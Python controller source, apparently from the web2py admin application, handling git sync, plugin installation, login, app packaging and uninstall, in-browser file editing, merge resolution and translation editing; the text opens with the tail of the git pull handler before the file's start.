origin.fetch()
origin.pull()
session.flash = T("Application updated via git pull")
redirect(URL('site'))
except git.CheckoutError:
session.flash = T("Pull failed, certain files could not be checked out. Check logs for details.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
except git.GitCommandError:
session.flash = T(
"Pull failed, git exited abnormally. See logs for details.")
redirect(URL('site'))
except AssertionError:
session.flash = T("Pull is not possible because you have unmerged files. Fix them up in the work tree, and then try again.")
redirect(URL('site'))
elif 'cancel' in request.vars:
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def git_push():
""" Git Push handler """
app = get_app()
if not have_git:
session.flash = GIT_MISSING
redirect(URL('site'))
form = SQLFORM.factory(Field('changelog', requires=IS_NOT_EMPTY()))
form.element('input[type=submit]')['_value'] = T('Push')
form.add_button(T('Cancel'), URL('site'))
form.process()
if form.accepted:
try:
repo = git.Repo(os.path.join(apath(r=request), app))
index = repo.index
index.add([apath(r=request) + app + '/*'])
new_commit = index.commit(form.vars.changelog)
origin = repo.remotes.origin
origin.push()
session.flash = T(
"Git repo updated with latest application changes.")
redirect(URL('site'))
except git.UnmergedEntriesError:
session.flash = T("Push failed, there are unmerged entries in the cache. Resolve merge issues manually and try again.")
redirect(URL('site'))
return dict(app=app, form=form)
def plugins():
app = request.args(0)
from gluon.serializers import loads_json
if not session.plugins:
try:
rawlist = urlopen("http://www.web2pyslices.com/" +
"public/api.json/action/list/content/Package?package" +
"_type=plugin&search_index=false").read()
session.plugins = loads_json(rawlist)
except:
response.flash = T('Unable to download the list of plugins')
session.plugins = []
return dict(plugins=session.plugins["results"], app=request.args(0))
def install_plugin():
app = request.args(0)
source = request.vars.source
plugin = request.vars.plugin
if not (source and app):
raise HTTP(500, T("Invalid request"))
# make sure no XSS attacks in source
if not source.lower().split('://')[0] in ('http','https'):
raise HTTP(500, T("Invalid request"))
form = SQLFORM.factory()
result = None
if form.process().accepted:
# get w2p plugin
if "web2py.plugin." in source:
filename = "web2py.plugin.%s.w2p" % \
source.split("web2py.plugin.")[-1].split(".w2p")[0]
else:
filename = "web2py.plugin.%s.w2p" % cleanpath(plugin)
if plugin_install(app, urlopen(source),
request, filename):
session.flash = T('New plugin installed: %s', filename)
else:
session.flash = \
T('unable to install plugin "%s"', filename)
redirect(URL(f="plugins", args=[app, ]))
return dict(form=form, app=app, plugin=plugin, source=source)
| # -*- coding: utf-8 -*-
EXPERIMENTAL_STUFF = True
MAXNFILES = 1000
if EXPERIMENTAL_STUFF:
if is_mobile:
response.view = response.view.replace('default/', 'default.mobile/')
response.menu = []
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config, prevent_open_redirect
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
have_git = True
except ImportError as e:
have_git = False
GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi user mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def count_lines(data):
return len([line for line in data.split('\n') if line.strip() and not line.startswith('#')])
def log_progress(app, mode='EDIT', filename=None, progress=0):
progress_file = os.path.join(apath(app, r=request), 'progress.log')
now = str(request.now)[:19]
if not os.path.exists(progress_file):
safe_open(progress_file, 'w').write('[%s] START\n' % now)
if filename:
safe_open(progress_file, 'a').write(
'[%s] %s %s: %s\n' % (now, mode, filename, progress))
def safe_open(a, b):
if (DEMO_MODE or is_gae) and ('w' in b or 'a' in b):
class tmp:
def write(self, data):
pass
def close(self):
pass
return tmp()
if PY2 or 'b' in b:
return open(a, b)
else:
return open(a, b, encoding="utf8")
def safe_read(a, b='r'):
safe_file = safe_open(a, b)
try:
return safe_file.read()
finally:
safe_file.close()
def safe_write(a, value, b='w'):
safe_file = safe_open(a, b)
try:
safe_file.write(value)
finally:
safe_file.close()
def get_app(name=None):
app = name or request.args(0)
if (app and os.path.exists(apath(app, r=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == app)(db.app.owner == auth.user.id).count())):
return app
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def index():
""" Index handler """
send = prevent_open_redirect(request.vars.send)
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not send:
send = URL('site')
if session.authorized:
redirect(send)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(send, list): # ## why does this happen?
send = str(send[0])
redirect(send)
else:
times_denied = login_record(False)
if times_denied >= allowed_number_of_attempts:
response.flash = \
T('admin disabled because too many invalid login attempts')
elif times_denied == allowed_number_of_attempts - 1:
response.flash = \
T('You have one more login attempt before you are locked out')
else:
response.flash = T('invalid password.')
return dict(send=send)
def check_version():
""" Checks if web2py is up to date """
session.forget()
session._unlock(response)
new_version, version = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if new_version in (-1, -2):
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif not new_version:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % version.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])
def logout():
""" Logout handler """
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def change_password():
if session.pam_user:
session.flash = T(
'PAM authenticated user, cannot change password here')
redirect(URL('site'))
form = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
_class="span4 well")
if form.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
form.errors.current_admin_password = T('invalid password')
elif form.vars.new_admin_password != form.vars.new_admin_password_again:
form.errors.new_admin_password_again = T('no match')
else:
path = abspath('parameters_%s.py' % request.env.server_port)
safe_write(path, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(form=form)
def site():
""" Site handler """
myversion = request.env.web2py_version
# Shortcut to make the elif statements more legible
file_or_appurl = 'file' in request.vars or 'appurl' in request.vars
class IS_VALID_APPNAME(object):
def __call__(self, value):
if not re.compile('^\w+$').match(value):
return (value, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(r=request), value)):
return (value, T('Application exists already'))
return (value, None)
is_appname = IS_VALID_APPNAME()
form_create = SQLFORM.factory(Field('name', requires=is_appname),
table_name='appcreate')
form_update = SQLFORM.factory(Field('name', requires=is_appname),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
form_create.process()
form_update.process()
if DEMO_MODE:
pass
elif form_create.accepted:
# create a new application
appname = cleanpath(form_create.vars.name)
created, error = app_create(appname, request, info=True)
if created:
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T('new application "%s" created', appname)
gluon.rewrite.load()
redirect(URL('design', args=appname))
else:
session.flash = \
DIV(T('unable to create application "%s"', appname),
PRE(error))
redirect(URL(r=request))
elif form_update.accepted:
if (form_update.vars.url or '').endswith('.git'):
if not have_git:
session.flash = GIT_MISSING
redirect(URL(r=request))
target = os.path.join(apath(r=request), form_update.vars.name)
try:
new_repo = git.Repo.clone_from(form_update.vars.url, target)
session.flash = T('new application "%s" imported',
form_update.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(r=request))
elif form_update.vars.url:
# fetch an application via URL or file upload
try:
f = urlopen(form_update.vars.url)
if f.code == 404:
raise Exception("404 file not found")
except Exception as e:
session.flash = \
DIV(T('Unable to download app because:'), PRE(repr(e)))
redirect(URL(r=request))
fname = form_update.vars.url
elif form_update.accepted and form_update.vars.file:
fname = request.vars.file.filename
f = request.vars.file.file
else:
session.flash = 'No file uploaded and no URL specified'
redirect(URL(r=request))
if f:
appname = cleanpath(form_update.vars.name)
installed = app_install(appname, f,
request, fname,
overwrite=form_update.vars.overwrite)
if f and installed:
msg = 'application %(appname)s installed with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T(msg, dict(appname=appname,
digest=md5_hash(installed)))
gluon.rewrite.load()
else:
msg = 'unable to install application "%(appname)s"'
session.flash = T(msg, dict(appname=form_update.vars.name))
redirect(URL(r=request))
regex = re.compile('^\w+$')
if is_manager():
apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
a != '__pycache__']
else:
apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
apps = [a for a in apps if a in FILTER_APPS]
apps = sorted(apps, key=lambda a: a.upper())
myplatform = platform.python_version()
return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
form_create=form_create, form_update=form_update)
def report_progress(app):
import datetime
progress_file = os.path.join(apath(app, r=request), 'progress.log')
regex = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
if not os.path.exists(progress_file):
return []
matches = regex.findall(open(progress_file, 'r').read())
events, counter = [], 0
for m in matches:
if not m:
continue
days = -(request.now - datetime.datetime.strptime(m[0],
'%Y-%m-%d %H:%M:%S')).days
counter += int(m[1])
events.append([days, counter])
return events
def pack():
app = get_app()
try:
if len(request.args) == 1:
fname = 'web2py.app.%s.w2p' % app
filename = app_pack(app, request, raise_ex=True)
else:
fname = 'web2py.app.%s.compiled.w2p' % app
filename = app_pack_compiled(app, request, raise_ex=True)
except Exception as e:
pferror = e
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', pferror)
redirect(URL('site'))
def pack_plugin():
app = get_app()
if len(request.args) == 2:
fname = 'web2py.plugin.%s.w2p' % request.args[1]
filename = plugin_pack(app, request.args[1], request)
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', args=request.args))
def pack_exe(app, base, filenames=None):
import urllib
import zipfile
# Download latest web2py_win and open it with zipfile
download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
out = StringIO()
out.write(urlopen(download_url).read())
web2py_win = zipfile.ZipFile(out, mode='a')
# Write routes.py with the application as default
routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
# Copy the application into the zipfile
common_root = os.path.dirname(base)
for filename in filenames:
fname = os.path.join(base, filename)
arcname = os.path.join('web2py/applications', app, filename)
web2py_win.write(fname, arcname)
web2py_win.close()
response.headers['Content-Type'] = 'application/zip'
response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
out.seek(0)
return response.stream(out)
def pack_custom():
app = get_app()
base = apath(app, r=request)
def ignore(fs):
return [f for f in fs if not (
f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]
files = {}
for (r, d, f) in os.walk(base):
files[r] = {'folders': ignore(d), 'files': ignore(f)}
if request.post_vars.file:
valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
files = request.post_vars.file
files = [files] if not isinstance(files, list) else files
files = [file for file in files if file in valid_set]
if request.post_vars.doexe is None:
fname = 'web2py.app.%s.w2p' % app
try:
filename = app_pack(app, request, raise_ex=True, filenames=files)
except Exception as e:
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', e)
redirect(URL(args=request.args))
else:
return pack_exe(app, base, files)
return locals()
def upgrade_web2py():
dialog = FORM.confirm(T('Upgrade'),
{T('Cancel'): URL('site')})
if dialog.accepted:
(success, error) = upgrade(request)
if success:
session.flash = T('web2py upgraded; please restart it')
else:
session.flash = T('unable to upgrade because "%s"', error)
redirect(URL('site'))
return dict(dialog=dialog)
def uninstall():
app = get_app()
dialog = FORM.confirm(T('Uninstall'),
{T('Cancel'): URL('site')})
dialog['_id'] = 'confirm_form'
dialog['_class'] = 'well'
for component in dialog.components:
component['_class'] = 'btn'
if dialog.accepted:
if MULTI_USER_MODE:
if is_manager() and db(db.app.name == app).delete():
pass
elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
pass
else:
session.flash = T('no permission to uninstall "%s"', app)
redirect(URL('site'))
try:
filename = app_pack(app, request, raise_ex=True)
except:
session.flash = T('unable to uninstall "%s"', app)
else:
if app_uninstall(app, request):
session.flash = T('application "%s" uninstalled', app)
else:
session.flash = T('unable to uninstall "%s"', app)
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def cleanup():
app = get_app()
clean = app_cleanup(app, request)
if not clean:
session.flash = T("some files could not be removed")
else:
session.flash = T('cache, errors and sessions cleaned')
redirect(URL('site'))
def compile_app():
app = get_app()
c = app_compile(app, request,
skip_failed_views=(request.args(1) == 'skip_failed_views'))
if not c:
session.flash = T('application compiled')
elif isinstance(c, list):
session.flash = DIV(*[T('application compiled'), BR(), BR(),
T('WARNING: The following views could not be compiled:'), BR()] +
[CAT(BR(), view) for view in c] +
[BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
else:
session.flash = DIV(T('Cannot compile: there are errors in your app:'),
CODE(c))
redirect(URL('site'))
def remove_compiled_app():
""" Remove the compiled application """
app = get_app()
remove_compiled_application(apath(app, r=request))
session.flash = T('compiled application removed')
redirect(URL('site'))
def delete():
""" Object delete handler """
app = get_app()
filename = '/'.join(request.args)
sender = request.vars.sender
if isinstance(sender, list): # ## fix a problem with Vista
sender = sender[0]
dialog = FORM.confirm(T('Delete'),
{T('Cancel'): URL(sender, anchor=request.vars.id)})
if dialog.accepted:
try:
full_path = apath(filename, r=request)
lineno = count_lines(open(full_path, 'r').read())
os.unlink(full_path)
log_progress(app, 'DELETE', filename, progress=-lineno)
session.flash = T('file "%(filename)s" deleted',
dict(filename=filename))
except Exception:
session.flash = T('unable to delete file "%(filename)s"',
dict(filename=filename))
redirect(URL(sender, anchor=request.vars.id2))
return dict(dialog=dialog, filename=filename)
def enable():
if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
app = get_app()
filename = os.path.join(apath(app, r=request), 'DISABLED')
if is_gae:
return SPAN(T('Not supported'), _style='color:yellow')
elif os.path.exists(filename):
os.unlink(filename)
return SPAN(T('Disable'), _style='color:green')
else:
if PY2:
safe_open(filename, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
else:
str_ = 'disabled: True\ntime-disabled: %s' % request.now
safe_open(filename, 'wb').write(str_.encode('utf-8'))
return SPAN(T('Enable'), _style='color:red')
def peek():
""" Visualize object code """
app = get_app(request.vars.app)
filename = '/'.join(request.args)
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
try:
data = safe_read(path).replace('\r', '')
except IOError:
session.flash = T('file does not exist')
redirect(URL('site'))
extension = filename[filename.rfind('.') + 1:].lower()
return dict(app=app,
filename=filename,
data=data,
extension=extension)
def test():
""" Execute controller tests """
app = get_app()
if len(request.args) > 1:
file = request.args[1]
else:
file = '.*\.py'
controllers = listdir(
apath('%s/controllers/' % app, r=request), file + '$')
return dict(app=app, controllers=controllers)
def keepalive():
return ''
def search():
keywords = request.vars.keywords or ''
app = get_app()
def match(filename, keywords):
filename = os.path.join(apath(app, r=request), filename)
if keywords in read_file(filename, 'r'):
return True
return False
path = apath(request.args[0], r=request)
files1 = glob(os.path.join(path, '*/*.py'))
files2 = glob(os.path.join(path, '*/*.html'))
files3 = glob(os.path.join(path, '*/*/*.html'))
files = [x[len(path) + 1:].replace(
'\\', '/') for x in files1 + files2 + files3 if match(x, keywords)]
return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))
def edit():
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
app_path = apath(app, r=request)
preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
preferences.update(config.read())
if not(request.ajax) and not(is_mobile):
# return the scaffolding, the rest will be through ajax requests
response.title = T('Editing %s') % app
return response.render('default/edit.html', dict(app=app, editor_settings=preferences))
# show settings tab and save prefernces
if 'settings' in request.vars:
if request.post_vars: # save new preferences
if PY2:
post_vars = request.post_vars.items()
else:
post_vars = list(request.post_vars.items())
# Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
if config.save(post_vars):
response.headers["web2py-component-flash"] = T('Preferences saved correctly')
else:
response.headers["web2py-component-flash"] = T('Preferences saved on session only')
response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
return
else:
details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
return response.json(details)
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
filename = '/'.join(request.args)
realfilename = request.args[-1]
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
# Try to discover the file type
if filename[-3:] == '.py':
filetype = 'python'
elif filename[-5:] == '.html':
filetype = 'html'
elif filename[-5:] == '.load':
filetype = 'html'
elif filename[-4:] == '.css':
filetype = 'css'
elif filename[-3:] == '.js':
filetype = 'javascript'
else:
filetype = 'html'
# ## check if file is not there
if ('revert' in request.vars) and os.path.exists(path + '.bak'):
try:
data = safe_read(path + '.bak')
data1 = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
safe_write(path, data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
safe_write(path + '.bak', data1)
response.flash = T('file "%s" of %s restored', (filename, saved_on))
else:
try:
data = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
lineno_old = count_lines(data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != file_hash:
session.flash = T('file changed on disk')
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path + '.1', data)
if 'from_ajax' in request.vars:
return response.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
args=request.args)})
else:
redirect(URL('resolve', args=request.args))
elif request.vars.data:
safe_write(path + '.bak', data)
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path, data)
lineno_new = count_lines(data)
log_progress(
app, 'EDIT', filename, progress=lineno_new - lineno_old)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
response.flash = T('file saved on %s', saved_on)
data_or_revert = (request.vars.data or request.vars.revert)
# Check compile errors
highlight = None
if filetype == 'python' and request.vars.data:
import _ast
try:
code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
compile(code, path, "exec", _ast.PyCF_ONLY_AST)
except Exception as e:
# offset calculation is only used for textarea (start/stop)
start = sum([len(line) + 1 for l, line
in enumerate(request.vars.data.split("\n"))
if l < e.lineno - 1])
if e.text and e.offset:
offset = e.offset - (len(e.text) - len(
e.text.splitlines()[-1]))
else:
offset = 0
highlight = {'start': start, 'end': start +
offset + 1, 'lineno': e.lineno, 'offset': offset}
try:
ex_name = e.__class__.__name__
except:
ex_name = 'unknown exception!'
response.flash = DIV(T('failed to compile file because:'), BR(),
B(ex_name), ' ' + T('at line %s', e.lineno),
offset and ' ' +
T('at char %s', offset) or '',
PRE(repr(e)))
if data_or_revert and request.args[1] == 'modules':
# Lets try to reload the modules
try:
mopath = '.'.join(request.args[2:])[:-3]
exec('import applications.%s.modules.%s' % (
request.args[0], mopath))
reload(sys.modules['applications.%s.modules.%s'
% (request.args[0], mopath)])
except Exception as e:
response.flash = DIV(
T('failed to reload module because:'), PRE(repr(e)))
edit_controller = None
editviewlinks = None
view_link = None
if filetype == 'html' and len(request.args) >= 3:
cfilename = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(cfilename, r=request)):
edit_controller = URL('edit', args=[cfilename.replace(os.sep, "/")])
view = request.args[3].replace('.html', '')
view_link = URL(request.args[0], request.args[2], view)
elif filetype == 'python' and request.args[1] == 'controllers':
# it's a controller file.
# Create links to all of the associated view files.
app = get_app()
viewname = os.path.splitext(request.args[2])[0]
viewpath = os.path.join(app, 'views', viewname)
aviewpath = apath(viewpath, r=request)
viewlist = []
if os.path.exists(aviewpath):
if os.path.isdir(aviewpath):
viewlist = glob(os.path.join(aviewpath, '*.html'))
elif os.path.exists(aviewpath + '.html'):
viewlist.append(aviewpath + '.html')
if len(viewlist):
editviewlinks = []
for v in sorted(viewlist):
vf = os.path.split(v)[-1]
vargs = "/".join([viewpath.replace(os.sep, "/"), vf])
editviewlinks.append(A(vf.split(".")[0],
_class="editor_filelink",
_href=URL('edit', args=[vargs])))
if len(request.args) > 2 and request.args[1] == 'controllers':
controller = (request.args[2])[:-3]
try:
functions = find_exposed_functions(data)
functions = functions and sorted(functions) or []
except SyntaxError as err:
functions = ['SyntaxError:Line:%d' % err.lineno]
else:
(controller, functions) = (None, None)
if 'from_ajax' in request.vars:
return response.json({'file_hash': file_hash, 'saved_on': saved_on, 'functions': functions, 'controller': controller, 'application': request.args[0], 'highlight': highlight})
else:
file_details = dict(app=request.args[0],
lineno=request.vars.lineno or 1,
editor_settings=preferences,
filename=filename,
realfilename=realfilename,
filetype=filetype,
data=data,
edit_controller=edit_controller,
file_hash=file_hash,
saved_on=saved_on,
controller=controller,
functions=functions,
view_link=view_link,
editviewlinks=editviewlinks,
id=IS_SLUG()(filename)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
plain_html = response.render('default/edit_js.html', file_details)
file_details['plain_html'] = plain_html
if is_mobile:
return response.render('default.mobile/edit.html',
file_details, editor_settings=preferences)
else:
return response.json(file_details)
def todolist():
""" Returns all TODO of the requested app
"""
app = request.vars.app or ''
app_path = apath('%(app)s' % {'app': app}, r=request)
dirs = ['models', 'controllers', 'modules', 'private']
def listfiles(app, dir, regexp='.*\.py$'):
files = sorted(listdir(apath('%(app)s/%(dir)s/' % {'app': app, 'dir': dir}, r=request), regexp))
files = [x.replace(os.path.sep, '/') for x in files if not x.endswith('.bak')]
return files
pattern = '#\s*(todo)+\s+(.*)'
regex = re.compile(pattern, re.IGNORECASE)
output = []
for d in dirs:
for f in listfiles(app, d):
matches = []
filename = apath(os.path.join(app, d, f), r=request)
with safe_open(filename, 'r') as f_s:
src = f_s.read()
for m in regex.finditer(src):
start = m.start()
lineno = src.count('\n', 0, start) + 1
matches.append({'text': m.group(0), 'lineno': lineno})
if len(matches) != 0:
output.append({'filename': f, 'matches': matches, 'dir': d})
return {'todo': output, 'app': app}
def editor_sessions():
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor_sessions', default_values={})
preferences = config.read()
if request.vars.session_name and request.vars.files:
session_name = request.vars.session_name
files = request.vars.files
preferences.update({session_name: ','.join(files)})
if config.save(preferences.items()):
response.headers["web2py-component-flash"] = T('Session saved correctly')
else:
response.headers["web2py-component-flash"] = T('Session saved on session only')
return response.render('default/editor_sessions.html', {'editor_sessions': preferences})
def resolve():
"""
"""
filename = '/'.join(request.args)
# ## check if file is not there
path = apath(filename, r=request)
a = safe_read(path).split('\n')
try:
b = safe_read(path + '.1').split('\n')
except IOError:
session.flash = 'Other file, no longer there'
redirect(URL('edit', args=request.args))
d = difflib.ndiff(a, b)
def leading(line):
""" """
# TODO: we really need to comment this
z = ''
for (k, c) in enumerate(line):
if c == ' ':
z += ' '
elif c == ' \t':
z += ' '
elif k == 0 and c == '?':
pass
else:
break
return XML(z)
def getclass(item):
""" Determine item class """
operators = {' ': 'normal', '+': 'plus', '-': 'minus'}
return operators[item[0]]
if request.vars:
c = '\n'.join([item[2:].rstrip() for (i, item) in enumerate(d) if item[0]
== ' ' or 'line%i' % i in request.vars])
safe_write(path, c)
session.flash = 'files merged'
redirect(URL('edit', args=request.args))
else:
# Making the short circuit compatible with <= python2.4
gen_data = lambda index, item: not item[:1] in ['+', '-'] and "" \
or INPUT(_type='checkbox',
_name='line%i' % index,
value=item[0] == '+')
diff = TABLE(*[TR(TD(gen_data(i, item)),
TD(item[0]),
TD(leading(item[2:]),
TT(item[2:].rstrip())),
_class=getclass(item))
for (i, item) in enumerate(d) if item[0] != '?'])
return dict(diff=diff, filename=filename)
def edit_language():
""" Edit language file """
app = get_app()
filename = '/'.join(request.args)
response.title = request.args[-1]
strings = read_dict(apath(filename, r=request))
if '__corrupted__' in strings:
form = SPAN(strings['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(strings.keys(), key=lambda x: to_native(x).lower())
rows = []
rows.append(H2(T('Original/Translation')))
for key in keys:
name = md5_hash(key)
s = strings[key]
(prefix, sep, key) = key.partition('\x01')
if sep:
prefix = SPAN(prefix + ': ', _class='tm_ftag')
k = key
else:
(k, prefix) = (prefix, '')
_class = 'untranslated' if k == s else 'translated'
if len(s) <= 40:
elem = INPUT(_type='text', _name=name, value=s,
_size=70, _class=_class)
else:
elem = TEXTAREA(_name=name, value=s, _cols=70,
_rows=5, _class=_class)
# Making the short circuit compatible with <= python2.4
k = (s != k) and k or B(k)
new_row = DIV(LABEL(prefix, k, _style="font-weight:normal;"),
CAT(elem, '\n', TAG.BUTTON(
T('delete'),
_onclick='return delkey("%s")' % name,
_class='btn')), _id=name, _class='span6 well well-small')
rows.append(DIV(new_row, _class="row-fluid"))
rows.append(DIV(INPUT(_type='submit', _value=T('update'), _class="btn btn-primary"), _class='controls'))
form = FORM(*rows)
if form.accepts(request.vars, keepvalues=True):
strs = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name] == chr(127):
continue
strs[key] = form.vars[name]
write_dict(apath(filename, r=request), strs)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args))
return dict(app=request.args[0], filename=filename, form=form)
def edit_plurals():
""" Edit plurals file """
app = get_app()
filename = '/'.join(request.args)
plurals = read_plural_dict(
apath(filename, r=request)) # plural forms dictionary
nplurals = int(request.vars.nplurals) - 1 # plural forms quantity
xnplurals = xrange(nplurals)
if '__corrupted__' in plurals:
# show error message and exit
form = SPAN(plurals['__corrupted__'], _class='error')
return dict(filename=filename, form=form)
keys = sorted(plurals.keys(), lambda x, y: cmp(
unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
tab_rows = []
for key in keys:
name = md5_hash(key)
forms = plurals[key]
if len(forms) < nplurals:
forms.extend(None for i in xrange(nplurals - len(forms)))
tab_col1 = DIV(CAT(LABEL(T("Singular Form")), B(key,
_class='fake-input')))
tab_inputs = [SPAN(LABEL(T("Plural Form #%s", n + 1)), INPUT(_type='text', _name=name + '_' + str(n), value=forms[n], _size=20), _class='span6') for n in xnplurals]
tab_col2 = DIV(CAT(*tab_inputs))
tab_col3 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % name, _class='btn'), _class='span6'))
tab_row = DIV(DIV(tab_col1, '\n', tab_col2, '\n', tab_col3, _class='well well-small'), _id=name, _class='row-fluid tab_row')
tab_rows.append(tab_row)
tab_rows.append(DIV(TAG['button'](T('update'), _type='submit',
_class='btn btn-primary'),
_class='controls'))
tab_container = DIV(*tab_rows, **dict(_class="row-fluid"))
form = FORM(tab_container)
if form.accepts(request.vars, keepvalues=True):
new_plurals = dict()
for key in keys:
name = md5_hash(key)
if form.vars[name + '_0'] == chr(127):
continue
new_plurals[key] = [form.vars[name + '_' + str(n)]
for n in xnplurals]
write_plural_dict(apath(filename, r=request), new_plurals)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(r=request, args=request.args, vars=dict(
nplurals=request.vars.nplurals)))
return dict(app=request.args[0], filename=filename, form=form)
def about():
""" Read about info """
app = get_app()
# ## check if file is not there
